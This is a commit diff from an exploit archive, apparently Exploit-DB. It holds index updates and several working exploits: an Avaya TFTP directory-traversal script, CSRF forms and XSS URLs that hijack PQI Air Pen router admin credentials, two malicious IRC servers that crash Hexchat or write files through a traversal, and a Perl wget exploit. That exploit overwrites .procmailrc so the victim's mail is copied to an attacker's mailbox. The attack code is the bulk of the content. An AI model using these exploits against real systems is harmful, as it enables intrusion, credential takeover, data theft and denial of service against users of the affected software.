28899,platforms/php/webapps/28899.txt,"NewP News Publishing System 1.0 Class.Database.PHP Remote File Include Vulnerability",2006-11-07,navairum,php,webapps,0
28900,platforms/php/webapps/28900.txt,"ac4p Mobile index.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0
@ -33334,7 +33334,7 @@ id,file,description,date,author,platform,type,port
36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0
36928,platforms/windows/local/36928.py,"Macro Toolworks 7.5 Local Buffer Overflow Vulnerability",2012-03-08,"Julien Ahrens",windows,local,0
36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
36930,platforms/multiple/webapps/36930.txt,"WordPress Freshmail Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
36930,platforms/multiple/webapps/36930.txt,"WordPress Freshmail - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
36933,platforms/linux/remote/36933.py,"ShellShock dhclient Bash Environment Variable Command Injection PoC",2014-09-29,fdiskyou,linux,remote,0
@ -33952,7 +33952,7 @@ id,file,description,date,author,platform,type,port
37602,platforms/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80
37603,platforms/php/webapps/37603.txt,"WordPress CP Contact Form with Paypal Plugin 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80
37604,platforms/php/webapps/37604.txt,"SO Planning 1.32 - Multiple Vulnerabilities",2015-07-13,"Huy-Ngoc DAU",php,webapps,80
37622,platforms/php/webapps/37622.txt,"WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS",2015-07-16,"Filippos Mastrogiannis",php,webapps,0
37622,platforms/php/webapps/37622.txt,"WordPress Download Manager Free 2.7.94 & Pro 4 - Authenticated Stored XSS",2015-07-16,"Filippos Mastrogiannis",php,webapps,0
37607,platforms/windows/dos/37607.py,"Internet Download Manager - (.ief) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
37608,platforms/windows/dos/37608.py,"Internet Download Manager - (Find Download) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
37609,platforms/xml/webapps/37609.txt,"Pimcore CMS Build 3450 - Directory Traversal",2015-07-14,Portcullis,xml,webapps,0
@ -34172,7 +34172,7 @@ id,file,description,date,author,platform,type,port
37938,platforms/php/webapps/37938.txt,"OpenX /www/admin/plugin-index.php parent Parameter XSS",2012-10-10,"High-Tech Bridge",php,webapps,0
37939,platforms/php/webapps/37939.txt,"FileContral Local File Include and Local File Disclosure Vulnerabilities",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0
38066,platforms/php/webapps/38066.txt,"WordPress Video Lead Form Plugin 'errMsg' Parameter Cross Site Scripting Vulnerability",2012-11-29,"Aditya Balapure",php,webapps,0
38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,"Glaysson dos Santos",hardware,webapps,80
38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,hardware,webapps,80
37833,platforms/php/webapps/37833.txt,"YCommerce Multiple SQL Injection Vulnerabilities",2012-09-21,"Ricardo Almeida",php,webapps,0
37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 Unspecified Remote Code Execution Vulnerability",2012-09-24,kb,linux,remote,0
37835,platforms/php/webapps/37835.html,"WordPress Cross Site Request Forgery Vulnerability",2012-09-22,AkaStep,php,webapps,0
@ -34548,7 +34548,7 @@ id,file,description,date,author,platform,type,port
38242,platforms/hardware/remote/38242.txt,"Thomson CableHome Gateway (DWG849) Cable Modem Gateway - Information Exposure",2015-09-19,"Matthew Dunlap",hardware,remote,0
38243,platforms/windows/local/38243.py,"Total Commander 8.52 - Buffer Overflow (Windows 10)",2015-09-20,VIKRAMADITYA,windows,local,0
38244,platforms/windows/local/38244.py,"Total Commander 8.52 - Buffer Overflow",2015-09-20,VIKRAMADITYA,windows,local,0
38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,"Glaysson dos Santos",hardware,webapps,0
38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,Orwelllabs,hardware,webapps,0
38246,platforms/php/webapps/38246.txt,"iCart Pro 'section' Parameter SQL Injection Vulnerability",2013-01-25,n3tw0rk,php,webapps,0
38248,platforms/multiple/remote/38248.txt,"Multiple Hunt CCTV Information Disclosure Vulnerability",2013-01-29,"Alejandro Ramos",multiple,remote,0
38249,platforms/multiple/dos/38249.txt,"MiniUPnP Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0
@ -35879,3 +35879,7 @@ id,file,description,date,author,platform,type,port
39651,platforms/android/dos/39651.txt,"Android - ih264d_process_intra_mb Memory Corruption",2016-04-01,"Google Security Research",android,dos,0
39652,platforms/multiple/dos/39652.txt,"Adobe Flash - Color.setTransform Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0
39653,platforms/php/dos/39653.txt,"PHP 5.5.33 - Invalid Memory Write",2016-04-01,vah_13,php,dos,0
39654,platforms/windows/dos/39654.pl,"Xion Audio Player <= 1.5 (build 160) - .mp3 Crash PoC",2016-04-04,"Charley Celice",windows,dos,0
39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0
39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0
39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 and 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0

Can't render this file because it is too large.

2
platforms/hardware/dos/38475.txt
View file

@ -13,6 +13,8 @@ Reported:
Public release:
Author: Lyon Yang <lyon[at]vantagepoint[dot]sg> <lyon.yang.s[at]gmail[dot]com>
Paper: https://www.exploit-db.com/docs/39658.pdf
Summary:
--------

121
platforms/hardware/remote/17507.py
View file

@ -1,105 +1,8 @@
##############################################################################
Title : Avaya IP Office Manager TFTP Server Directory Traversal Vulnerability
Author : Veerendra G.G from SecPod Technologies (www.secpod.com)
Vendor : http://www.avaya.com/usa/product/ip-office
Advisory : http://www.avaya.com/usa/product/ip-office
http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap
http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py
http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt
Version : Avaya IP Office Manager TFTP Server Version 8.1
Date : 08/07/2011
###############################################################################
SecPod ID: 1017 25/05/2011 Issue Discovered
31/05/2011 Vendor Notified
No Response from the Vendor
08/07/2011 Advisory Released
Class: Information Disclosure Severity: Medium
Overview:
---------
Avaya IP Office Manager TFTP Server Version 8.1 is prone to a Directory
Traversal vulnerability.
Technical Description:
----------------------
The vulnerability is caused due to improper validation to Read Request
Parameter containing '../' sequences, which allows attackers to read
arbitrary files via directory traversal attacks.
Impact:
--------
Successful exploitation could allow an attacker to to obtain sensitive
information, which can lead to launching further attacks.
Affected Software:
------------------
Avaya IP Office Manager TFTP Server Version 8.1
Tested on:
-----------
Avaya IP Office Manager TFTP Server Version 8.1 on Windows XP SP3.
References:
-----------
http://secpod.org/blog/?p=225
http://www.avaya.com/usa/product/ip-office
http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap
http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py
http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt
Proof of Concept:
----------------
http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py
http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap
Solution:
----------
Not available
Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = LOW
AUTHENTICATION = NOT_REQUIRED
CONFIDENTIALITY_IMPACT = PARTIAL
INTEGRITY_IMPACT = NONE
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N)
CVSS Temporal Score = 4.5
Risk factor = Medium
Credits:
--------
Veerendra G.G of SecPod Technologies has been credited with the discovery of
this vulnerability.
SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py:
#!/usr/bin/python
##############################################################################
# Exploit : http://secpod.org/blog/?p=3D225
# http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py
# http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt
# Exploit : http://secpod.com/blog/?p=225
# http://secpod.org/Exploit-Avaya-IP-Manager-Dir-Trav.py
# http://secpod.org/advisories/SecPod_Avaya_IP_Manager_TFTP_Dir_Trav.txt
# Author : Veerendra G.G from SecPod Technologies (www.secpod.com)
#
# Get File content using Directory Traversal Attack
@ -111,13 +14,13 @@ def sendPacket(HOST, PORT, data):
Sends UDP Data to a Particular Host on a Specified Port
with a Given Data and Return the Response
'''
udp_sock =3D socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_sock.sendto(data, (HOST, PORT))
data =3D udp_sock.recv(1024)
data = udp_sock.recv(1024)
udp_sock.close()
return data
if __name__ =3D=3D "__main__":
if __name__ == "__main__":
if len(sys.argv) < 2:
print "\tUsage: python exploit.py target_ip"
@ -125,13 +28,13 @@ if __name__ =3D=3D "__main__":
print "\tExiting..."
sys.exit(0)
HOST =3D sys.argv[1] =09=09=09## The Server IP
PORT =3D 69 =09=09=09## Default TFTP port
HOST = sys.argv[1] ## The Server IP
PORT = 69 ## Default TFTP port
data =3D "\x00\x01" =09=09=09## TFTP Read Request
data +=3D "../" * 10 + "boot.ini" + "\x00"=09## Read boot.ini file using directory traversal
data +=3D "octet\x00"=09=09=09=09## TFTP Type
data = "\x00\x01" ## TFTP Read Request
data += "../" * 10 + "boot.ini" + "\x00" ## Read boot.ini file using directory traversal
data += "octet\x00" ## TFTP Type
rec_data =3D sendPacket(HOST, PORT, data)
rec_data = sendPacket(HOST, PORT, data)
print "Data Found on the target : %s " %(HOST)
print rec_data.strip()

231
platforms/hardware/webapps/39659.txt Executable file
View file

@ -0,0 +1,231 @@
_ _ _ _
| | | | | |
___ _ ____ _____| | | | __ _| |__ ___
/ _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|
| (_) | | \ V V / __/ | | | (_| | |_) \__ \
\___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/
Security Adivisory
2016-04-03
www.orwelllabs.com
Twitter:@orwelllabs
magicword: d0ubl3th1nk1ng...
Overview
=======
Technical Risk: high
Likelihood of Exploitation: medium
Vendor: PQI Group
Affected Products: PQI Air Pen Express - Wireless Router 6W51-0000R2 and
6W51-0000R2XXX
Credits: Discovered and researched by Orwelllabs
Adivisory URL:
http://www.orwelllabs.com/2016/04/pqi-air-pen-express-wireless-router.html
Issues
=====
I. Multiple Cross-Site Request Forgery (CSRF) (CWE-352)
II. Multiple Stored Cross-site Scripting (CWE-79)
III. Multiple Reflected Cross-Site Scripting (CWE-79)
IV. Insecure Direct Request
V. Insecure Default Permissions (CWE-276)
VI. No SSL
background
=========
The smart lipstick-shaped PQI Air Pen express is the world's smallest
wireless router/access point combo you can get today.
PQI Air Pen express can be powered via an external adapter or a powered USB
port on your computer and provide a excellent wireless expreience for
everyone.
I. Cross-Site Request Forgery (CSRF) (CWE-352)
```````````````````````````````````````````````````````````````````````
If a user visits a page bellow, this will set the administrative credential
for PQI Air Pen express to "root:r00t"
<html>
<!-- CSRF PoC -->
<body>
<form action="http://{airpenXweb}/goform/setSysAdm" method="POST">
<input type="hidden" name="admuser" value="root" />
<input type="hidden" name="admpass" value="r00t" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
The attacker can also abuse of the multiple XSS in this device to exploit
this vulnerability, something like this to set the same cred 'root:r00t'
http://
{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=%3Cscript%20src=%22
http://airpenXweb/goform/setSysAdm?admuser=root&admpass=r00t%22%3E%3C/script%3E%3C!--
The following poc will set the credential to access point to "3groot:3g00t"
(and of course, any other value could be set in this way.)
<html>
<!-- CSRF PoC2 -->
<body>
<form action="http://{airpenXweb}/goform/setWan" method="POST">
<input type="hidden" name="connectionType" value="DHCP" />
<input type="hidden" name="staticIp" value="xxx&#46;xxx&#46;xxx&#46;xxx" />
<input type="hidden" name="staticNetmask" value="255&#46;255&#46;255&#46;0"
/>
<input type="hidden" name="staticGateway"
value="xxx&#46;xxx&#46;xxx&#46;xxx" />
<input type="hidden" name="staticPriDns" value="xxx&#46;xxx&#46;xxx&#46;x"
/>
<input type="hidden" name="staticSecDns" value="xxx&#46;xxx&#46;xxx&#46;x"
/>
<input type="hidden" name="hostname" value="" />
<input type="hidden" name="pppoeUser" value="pppoe&#95;user" />
<input type="hidden" name="pppoePass" value="pppoe&#95;passwd" />
<input type="hidden" name="pppoePass2" value="pppoe&#95;passwd" />
<input type="hidden" name="pppoeOPMode" value="KeepAlive" />
<input type="hidden" name="pppoeRedialPeriod" value="60" />
<input type="hidden" name="pppoeIdleTime" value="5" />
<input type="hidden" name="l2tpServer" value="l2tp&#95;server" />
<input type="hidden" name="l2tpUser" value="l2tp&#95;user" />
<input type="hidden" name="l2tpPass" value="l2tp&#95;passwd" />
<input type="hidden" name="l2tpMode" value="0" />
<input type="hidden" name="l2tpIp" value="192&#46;168&#46;1&#46;1" />
<input type="hidden" name="l2tpNetmask" value="255&#46;255&#46;255&#46;0"
/>
<input type="hidden" name="l2tpGateway" value="192&#46;168&#46;1&#46;254"
/>
<input type="hidden" name="l2tpOPMode" value="KeepAlive" />
<input type="hidden" name="l2tpRedialPeriod" value="60" />
<input type="hidden" name="pptpServer" value="pptp&#95;server" />
<input type="hidden" name="pptpUser" value="pptp&#95;user" />
<input type="hidden" name="pptpPass" value="pptp&#95;passwd" />
<input type="hidden" name="pptpMode" value="0" />
<input type="hidden" name="pptpIp" value="192&#46;168&#46;1&#46;1" />
<input type="hidden" name="pptpNetmask" value="255&#46;255&#46;255&#46;0"
/>
<input type="hidden" name="pptpGateway" value="192&#46;168&#46;1&#46;254"
/>
<input type="hidden" name="pptpOPMode" value="KeepAlive" />
<input type="hidden" name="pptpRedialPeriod" value="60" />
<input type="hidden" name="APN3G" value="" />
<input type="hidden" name="PIN3G" value="" />
<input type="hidden" name="Dial3G" value="" />
<input type="hidden" name="User3G" value="3groot" /> < -- 3G
User
<input type="hidden" name="Password3G" value="3gr00t" /> <-- 3G
Password
<input type="hidden" name="Dev3G" value="Auto" />
<input type="hidden" name="macCloneEnbl" value="0" />
<input type="hidden" name="macCloneMac" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
II. Stored Cross-site Scripting (CWE-79)
``````````````````````````````````````````````````````````
"Wide Area Network (WAN) Settings"
# PocParameter: "hostname"
http://{airpenXweb}/goform/setWan?connectionType=DHCP&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=&staticPriDns=&staticSecDns=xxx.xxx.xxx.xxx&hostname=[
* STOREDXSS
*]&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac=
"Webs URL Filter Settings"
# PocParameter: "addURLFilter"
http://{airpenXweb}/goform/websURLFilter?addURLFilter=[ *STOREDXSS*
]&addwebsurlfilter=Add
Request in this page will show a pop-up with a content of javascript
payload:
http://{airpenXweb}/firewall/content_filtering.asp
# Parameter: "addHostFilter"
http://{airpenXweb}/goform/websHostFilter?addHostFilter=[ *STOREDXSS*
]&addwebscontentfilter=Add
III. Reflected Cross-Site Scripting (CWE-79)
``````````````````````````````````````````````````````````````
Virtually all application inputs are vulnerable to cross-site scripting,
since it is not carried out any validation of the data provided by the
user.
Bellow are some examples:
"Basic Wireless Settings"
# PocParameter: "mssid_0"
http://{airpenXweb}/goform/wirelessBasic?radiohiddenButton=2&wifihiddenButton=2&wirelessmode=9&bssid_num=1&mssid_0=[*
XSS *
]&mssid_1=&mssid_2=&mssid_3=&mssid_4=&mssid_5=&mssid_6=&mssid_8=&mssid_9=&mssid_10=&mssid_11=&mssid_12=&mssid_13=&mssid_14=&mssid_15=&broadcastssid=1&apisolated=0&mbssidapisolated=0&sz11gChannel=1&n_mode=0&n_bandwidth=1&n_gi=1&n_mcs=33&n_rdg=1&n_extcha=1&n_stbc=1&n_amsdu=0&n_autoba=1&n_badecline=0&n_disallow_tkip=1&n_2040_coexit=1&tx_stream=1&rx_stream=1
# PocParameter: "ssid"
http://{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=[ * XSS *
]&security_mode=Disable&wzsecureAlgorithm=AES
# PocParameter: "hostname"
http://{airpenXweb}/goform/setWan?connectionType=[ -*- XSS
-*-]&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=xxx.xxx.xxx.xxx&staticPriDns=xxx.xxx.xxx.xxx5&staticSecDns=203.185.0.36&hostname=tiat&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=%3Cscript%3Ealert%281%29%3C/script%3E&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac=
# Parameter: "admpass"
http://{airpenXweb}/goform/setSysAdm?admuser=root&admpass=[ -*- XSS -*- ]
IV. Insecure Direct Request
````````````````````````````````````````
This device allows remote attackers to obtain sensitive information,
including all credentials available via direct request to
/cgi-bin/ExportSettings.sh.
PoC:
http://{airpenXweb}/cgi-bin/ExportSettings.sh
V. Insecure Default Permissions (CWE-276)
``````````````````````````````````````````````````````````````
In the device description (on the Vendor's site) it is very clear that the
priority is to
facilitate everything for you, including setting. Therefore it is not
mandatory that a password
is configured for the web interface and not to connect to the AP, this way
you can find hundreds
of these completely unprotected APs.
VI. No SSL
``````````````````
Any action, whether sensitive or not is transmitted in plain text because
HTTPS is not used and no step.
POST /goform/setSysAdm HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101
Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.xxx.xxx/adm/management.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
admuser=ORWL_user&admpass=ORWL_pass
Timeline
=======
2015-10-25 - Issues discovered
2015-11-04 - Vendor contacted
2015-12-12 - Another attempt to contact the Vendor...
2016-02-26 - Public Disclosure
* There is no easy way to contact the vendor. Emails sent remain unanswered
and forms site contacts as well.

74
platforms/multiple/dos/39657.py Executable file
View file

@ -0,0 +1,74 @@
#!/usr/bin/python
#
####################
# Meta information #
####################
# Exploit Title: Hexchat IRC client - CAP LS Handling Stack Buffer Overflow
# Date: 2016-02-07
# Exploit Author: PizzaHatHacker
# Vendor Homepage: https://hexchat.github.io/index.html
# Software Link: https://hexchat.github.io/downloads.html
# Version: 2.11.0
# Tested on: HexChat 2.11.0 & Linux (64 bits) + HexChat 2.10.2 & Windows 8.1 (64 bits)
# CVE : CVE-2016-2233
#############################
# Vulnerability description #
#############################
'''
Stack Buffer Overflow in src/common/inbound.c :
void inbound_cap_ls (server *serv, char *nick, char *extensions_str, const message_tags_data *tags_data)
In this function, Hexchat IRC client receives the available extensions from
the IRC server (CAP LS message) and constructs the request string to indicate
later which one to use (CAP REQ message).
This request string is stored in the fixed size (256 bytes) byte array
'buffer'. It has enough space for all possible options combined, BUT
it will overflow if some options are repeated.
CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS Base Score : 7.5
Impact Subscore : 6.4
Exploitability Subscore : 10
'''
####################
# Proof of Concept #
####################
'''
* Install Hexchat IRC Client
* Run this Python script on a (server) machine
* Connect to the server running the script
* Results : Hexchat will crash (most probably access violation/segmentation fault)
'''
import socket
import sys
import time
# Exploit configuration
HOST = ''
PORT = 6667
SERVERNAME = 'irc.example.com'
OPTIONS = 'multi-prefix ' * 100 # 13*100 = 1300 bytes > 256 bytes
# Create server socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind((HOST, PORT)) # Bind to port
sock.listen(0) # Start listening on socket
print 'Server listening, waiting for connection...'
conn, addr = sock.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...'
conn.send(':' + SERVERNAME + ' CAP * LS :' + OPTIONS + '\r\n')
# Wait and close socket
conn.recv(256)
sock.close()
print 'Done.'
except socket.error as msg:
print 'Network error : ' + str(msg[0]) + ' ' + msg[1]

93
platforms/multiple/local/39656.py Executable file
View file

@ -0,0 +1,93 @@
#!/usr/bin/python
#
####################
# Meta information #
####################
# Exploit Title: Hexchat IRC client - Server name log directory traversal
# Date: 2016-01-26
# Exploit Author: PizzaHatHacker
# Vendor Homepage: https://hexchat.github.io/index.html
# Software Link: https://hexchat.github.io/downloads.html
# Version: 2.11.0
# Tested on: HexChat 2.11.0 & Linux (64 bits)
# CVE : CVE-2016-2087
#############################
# Vulnerability description #
#############################
'''
Server Name Directory Traversal in src/common/text.c :
static char * log_create_pathname (char *servname, char *channame, char *netname)
In this function, channame (channel name) and netname (network name as
configured in the client software) are sanitized to prevent directory
traversal issues when creating a logfile BUT servname (server-provided
information) is NOT sanitized before possibly being injected into
the file path via the 'log_insert_vars' function call.
This bug could be triggered in the special (non-default) configuration
where a user would have :
* Enabled logging (Settings > Preferences > Chatting > Logging)
* Used a pattern containing '%s' in the log filepath (instead
of the default = '%n\%c.log').
When connecting to a malicious server, Hexchat IRC client may create or modify
arbitrary files on the filesystem with the permissions of the IRC client user
(non-root). For example, the following directories are accessible easily :
* <Hexchat-Conf>/addons : Executable plugin files that are automatically loaded
when starting Hexchat IRC client
* <Hexchat-Conf>/logs : ALL logfiles (from other servers too)
* <Hexchat-Conf>/scrollback : Scrollback text that is automatically
loaded when entering a channel/server (this may trigger further bugs)
* <Hexchat-Conf>/sounds : Sounds that may be played on demand via CTCP
SOUND messages (this could also trigger further bugs)
* etc.
CVSS v2 Vector : (AV:N/AC:H/Au:N/C:N/I:P/A:P)
CVSS Base Score : 4
Impact Subscore : 4.9
Exploitability Subscore : 4.9
'''
####################
# Proof of Concept #
####################
'''
* Install Hexchat IRC Client
* Settings > Preferences > Chatting > Logging : Enable logging and use the log
filepath pattern : '%s\%c.log' (without the quotes)
* Run this Python script on a (server) machine
* Connect to the server running the script
* Results : A 'PIZZA' directory will appear in <Hexchat-Conf>/PIZZA instead
of something like <Hexchat-Conf>/logs/___PIZZA
'''
import socket
import sys
import time
# Exploit configuration
HOST = ''
PORT = 6667
SERVERNAME = '../PIZZA'
# Create server socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind((HOST, PORT)) # Bind to port
sock.listen(0) # Start listening on socket
print 'Server listening, waiting for connection...'
conn, addr = sock.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...'
conn.send(':' + SERVERNAME + ' 001 bob :Welcome to the Internet Relay Network\r\n')
# Wait and close socket
conn.recv(256)
sock.close()
print 'Done.'
except socket.error as msg:
print 'Failure binding to port : ' + str(msg[0]) + ' ' + msg[1]

88
platforms/multiple/remote/689.pl
View file

@ -1,8 +1,8 @@
#!/usr/bin/perl -W
# wgettrap.poc -- A POC for the wget(1) directory traversal vulnerability
#
# Copyright 2004 Jan Min=C3=A1=C5=99 (jjminar fastmail fm)
# License: Public Domain - SECU
# Copyright 2004 Jan Min???? (jjminar fastmail fm)
# License: Public Domain
#
# When wget connects to us, we send it a HTTP redirect constructed so that wget
# wget will connect the second time, it will be attempting to override
@ -12,20 +12,20 @@
use POSIX qw(strftime);
# This is our scheme/host/port
$server =3D "http://localhost:31340";
$server = "http://localhost:31340";
# Use this + DNS poisoning with wget 1.9 & CVS
#$server =3D "http://..";
#$server = "http://..";
# Wanna know who got infected?=20
#$log =3D "/dev/pts/1";
# Wanna know who got infected?
#$log = "/dev/pts/1";
# The filename we will try to overwrite on the target system
$filename =3D "/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored.";
$filename = "/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored.";
############### Payload #########################################
$email =3D 'your@mailbox';
$password =3D 'Pmrpuf ner cevzvgvirf';
$payload =3D <<EOP;
$email = 'your@mailbox';
$password = 'Pmrpuf ner cevzvgvirf';
$payload = <<EOP;
:0c
| mail -s 'Wgettrap mail copy' $email
:0
@ -37,36 +37,36 @@ chomp $payload;
############### Payload #########################################
# A simple directory traversal, for greater effect
$trick =3D "/.." . "%2f.." x 40;
$trick = "/.." . "%2f.." x 40;
open LOG, ">$log" if $log;
while(<STDIN>){
print LOG $_ if $log;
if (/\Q$trick$filename\E/) {
#if (/%2f/) {
# We see the filename, so this is the second time
# they're here. Time to feed the sploit.
$second++;
} elsif (/^Range: bytes=3D\(33\)-/) {
# Appending goes like this:
# (1) Tell'em what you're gonna tell'em
# (2) Then tell'em just a half
# (3) Close it
# (4) Wait
# (5) They're comin' back, with wget -c
# (6) Tell'em the sploit
# (7) Close again
# (8) Wtf? They're comin' back with wget -c again
# (9) Tell'em the rest...
# (10) ... enjoying the backdoor at the same time
print LOG "File if $1 bytes long\n" if $log;
} elsif (/^\r?$/) {
# The HTTP headers are over. Let's do it!
$date =3D strftime ("%a, %e %b %Y %H:%M:%S %z", localtime);
if (!$second) {
# Print the payload
print <<EOT;
print LOG $_ if $log;
if (/\Q$trick$filename\E/) {
#if (/%2f/) {
# We see the filename, so this is the second time
# they're here. Time to feed the sploit.
$second++;
} elsif (/^Range: bytes=\(33\)-/) {
# Appending goes like this:
# (1) Tell'em what you're gonna tell'em
# (2) Then tell'em just a half
# (3) Close it
# (4) Wait
# (5) They're comin' back, with wget -c
# (6) Tell'em the sploit
# (7) Close again
# (8) Wtf? They're comin' back with wget -c again
# (9) Tell'em the rest...
# (10) ... enjoying the backdoor at the same time
print LOG "File if $1 bytes long\n" if $log;
} elsif (/^\r?$/) {
# The HTTP headers are over. Let's do it!
$date = strftime ("%a, %e %b %Y %H:%M:%S %z", localtime);
if (!$second) {
# Print the payload
print <<EOT;
HTTP/1.1 301 Moved Permanently\r
Date: $date\r
Server: wgettrap 1.1\r
@ -78,9 +78,9 @@ Content-Type: text/html\r
\r
<html><head><title></title></head></html>\r
EOT
} else {
# Print the redirection
print <<EOT;
} else {
# Print the redirection
print <<EOT;
HTTP/1.1 200 OK\r
Date: $date\r
Server: wgettrap 1.1\r
@ -91,9 +91,7 @@ Content-Type: text/plain\r
\r
$payload
EOT
}
exit 0;
}
}
# milw0rm.com [2004-12-15]
}
exit 0;
}
}

23
platforms/windows/dos/39654.pl Executable file
View file

@ -0,0 +1,23 @@
# Exploit Title: Xion Audio Player <= 1.5 (build 160) - Crash PoC
# Date: 01-04-2016
# Software Link: http://www.r2.com.au/downloads/files/xion-audio-player-v1.5b160.zip
# Homepage: http://www.xionplayer.com/
# Exploit Author: Charley Celice (stmerry)
# Contact: https://twitter.com/charleycelice
#
# Category: Crash PoC
# Tested on: Windows XP SP3 English
# Details: Overflowing title/artist tags on an *.mp3 seems to crash the software.
# (works on both standalone/portable versions)
